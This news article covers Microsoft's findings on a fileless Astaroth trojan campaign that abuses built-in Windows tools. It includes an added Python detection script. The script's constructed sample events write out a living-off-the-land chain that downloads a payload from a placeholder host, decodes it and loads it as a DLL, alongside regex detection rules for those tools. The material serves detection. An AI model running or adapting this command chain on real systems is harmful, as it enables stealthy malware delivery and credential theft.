Security researchers at Microsoft have published details of a new widespread campaign distributing a notorious piece of fileless malware that was found mainly targeting European and Brazilian users earlier this year.
Called Astaroth, the trojan has been active since at least 2017 and is designed to steal sensitive information such as credentials, keystrokes, and other data, without dropping an executable file on disk or installing any software on the victim’s machine.
Astaroth, which was first documented by researchers at Cybereason in February this year, lives off the land by running its payload directly in the memory of an infected computer and by abusing legitimate system tools, such as WMIC, Certutil, Bitsadmin, and Regsvr32, to execute the malicious code.
While reviewing Windows telemetry data, Andrea Lelli, a researcher on the Microsoft Defender ATP Research Team, recently noticed a sudden and unusual spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool, which led to the discovery of a fileless attack.
Further investigation revealed that the attackers behind this campaign are distributing the multi-stage Astaroth malware through spear-phishing emails containing a malicious link to a website hosting an LNK shortcut file. When opened, the LNK file launches WMIC, which fetches and runs the next stages of the chain.
“All the payloads are Base64-encoded and decoded using the Certutil tool. Two of them result in plain DLL files (the others remain encrypted),” the researcher said in a blog post published Monday.
“The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process.”
This means the malware does not rely on any vulnerability exploit or traditional trojan downloader to fetch anything onto the targeted system. Instead, it relies entirely on built-in system tools and commands throughout its attack chain in order to masquerade as regular activity.
This technique is known as “living off the land” and lets the malware evade detection by most endpoint antivirus solutions that rely on static file scanning.
The initial access and execution stages used to silently install the Astaroth malware on target devices are illustrated in the attack chain shown above.
Once on the targeted system, Astaroth attempts to steal sensitive information such as credentials, keystrokes, and other data, and sends it to a remote server controlled by the attackers.
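The chain described above (WMIC fetching a remote script, Bitsadmin downloading payloads, Certutil decoding Base64, Regsvr32 loading a decoded DLL) is precisely the kind of evidence that process-creation logging retains even when no malicious file is ever written in a form a scanner would catch. The following Python script is an added example, not code from Microsoft or from the Astaroth analysis: it runs a small set of rules over constructed Sysmon-style process-creation events and reports any host on which two or more of those stages share a common ancestor. The host names, PIDs, the example.invalid URL and the file paths are all made up for illustration; the rules key only on the tool names and switches the article mentions.

```python
"""Flag an Astaroth-style living-off-the-land chain in process-creation events.

Added example; the events below are constructed, not real telemetry.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (the shape of Sysmon EID 1 / Security 4688)."""
    host: str
    pid: int
    ppid: int
    image: str
    cmdline: str


# Each rule pairs an image-name regex with a command-line regex. The binaries are
# all legitimate; what is suspicious is the switch combination and target path.
LOLBIN_RULES = {
    "wmic_remote_xsl": (
        re.compile(r"(^|\\)wmic\.exe$", re.I),
        re.compile(r"/format:\s*[\"']?https?://", re.I),      # WMIC pulling a remote XSL
    ),
    "bitsadmin_download": (
        re.compile(r"(^|\\)bitsadmin\.exe$", re.I),
        re.compile(r"/transfer\b", re.I),                     # BITS job used as a downloader
    ),
    "certutil_decode": (
        re.compile(r"(^|\\)certutil\.exe$", re.I),
        re.compile(r"-decode\b", re.I),                       # Base64 decode of a payload
    ),
    "regsvr32_user_path": (
        re.compile(r"(^|\\)regsvr32\.exe$", re.I),
        re.compile(r"/s\b.*\\(users|temp|public|programdata)\\", re.I),  # silent load from writable dir
    ),
}

MIN_STAGES = 2  # distinct stages under one ancestor before we alert


def match_rules(event):
    """Return the names of every rule this single event satisfies."""
    return [name for name, (img_re, cmd_re) in LOLBIN_RULES.items()
            if img_re.search(event.image) and cmd_re.search(event.cmdline)]


def find_chains(events):
    """For every rule hit, walk up its parent chain on the same host and merge the
    hits found along the way under the top-most matching ancestor. Chains with at
    least MIN_STAGES distinct stages are returned, one finding per chain root."""
    by_host = defaultdict(dict)
    for ev in events:
        by_host[ev.host][ev.pid] = ev

    chains = {}
    for host, procs in by_host.items():
        for ev in procs.values():
            if not match_rules(ev):
                continue
            path_hits, root_pid, seen, cur = set(), ev.pid, set(), ev
            while cur is not None and cur.pid not in seen:   # guard against PID cycles
                seen.add(cur.pid)
                hits = match_rules(cur)
                if hits:
                    path_hits.update(hits)
                    root_pid = cur.pid                        # highest matching ancestor so far
                cur = procs.get(cur.ppid)
            chains.setdefault((host, root_pid), set()).update(path_hits)

    return [{"host": h, "root_pid": p, "stages": sorted(s)}
            for (h, p), s in sorted(chains.items()) if len(s) >= MIN_STAGES]


# Constructed sample: ws01 shows the Astaroth-style tree under WMIC; ws02 is an
# administrator legitimately decoding a certificate and registering a vendor DLL.
SAMPLE_EVENTS = [
    ProcEvent("ws01", 100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("ws01", 200, 100, r"C:\Windows\System32\wbem\WMIC.exe",
              'wmic.exe os get /format:"https://example.invalid/v.xsl"'),
    ProcEvent("ws01", 300, 200, r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /transfer upd /download /priority foreground "
              r"https://example.invalid/r1.log C:\Users\Public\Libraries\r1.log"),
    ProcEvent("ws01", 400, 200, r"C:\Windows\System32\certutil.exe",
              r"certutil -decode C:\Users\Public\Libraries\r1.log C:\Users\Public\Libraries\r1.dll"),
    ProcEvent("ws01", 500, 200, r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32 /s C:\Users\Public\Libraries\r1.dll"),
    ProcEvent("ws02", 10, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("ws02", 20, 10, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent("ws02", 30, 20, r"C:\Windows\System32\certutil.exe",
              r"certutil -decode C:\Users\alice\Desktop\cert.b64 C:\Users\alice\Desktop\cert.cer"),
    ProcEvent("ws02", 40, 20, r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32 /s "C:\Program Files\Vendor\tool.dll"'),
]


if __name__ == "__main__":
    for finding in find_chains(SAMPLE_EVENTS):
        print(finding)
```

Running the script reports a single chain, rooted at the WMIC process on ws01, with all four stages; the administrator's lone certutil and regsvr32 on ws02 never accumulate a second stage under a common ancestor, so they are not raised. Any one of these tools on its own is normal, which is why the rules are combined by ancestry rather than alerted individually.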
The attacker can then use this stolen data to try “moving laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground,” the researcher said.
Microsoft said the various features of its Defender ATP next-generation protection can detect such fileless attacks at each stage of infection, whereas, it argues, file-centric security solutions fail to protect their customers.
Lelli said: “Being fileless doesn’t mean being invisible; it certainly doesn’t mean being undetectable. There’s no such thing as the perfect cybercrime: even fileless malware leaves a long trail of evidence.”